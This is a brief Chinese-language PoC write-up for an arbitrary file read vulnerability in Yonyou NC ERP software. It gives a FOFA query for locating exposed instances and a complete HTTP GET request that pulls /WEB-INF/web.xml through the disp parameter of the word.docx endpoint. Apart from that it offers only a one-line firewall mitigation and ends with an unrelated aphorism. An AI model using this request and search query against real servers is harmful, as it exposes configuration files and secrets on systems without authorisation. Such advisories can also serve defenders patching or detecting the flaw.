用友NC word.docx任意文件读取漏洞

产品简介

用友NC是一款企业级ERP软件。作为一种信息化管理工具，用友NC提供了一系列业务管理模块，包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等，帮助企业实现数字化转型和高效管理

漏洞概述

用友NC在word.docx的disp参数存在任意文件读取漏洞

指纹识别

fofa:

app="用友-UFIDA-NC"

漏洞利用

Poc:

GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0

修复建议

临时缓解措施：在应用防火墙上配置 禁止访问word.docx接口策略

【其实吵架从来没有输赢的，或者说都是输。】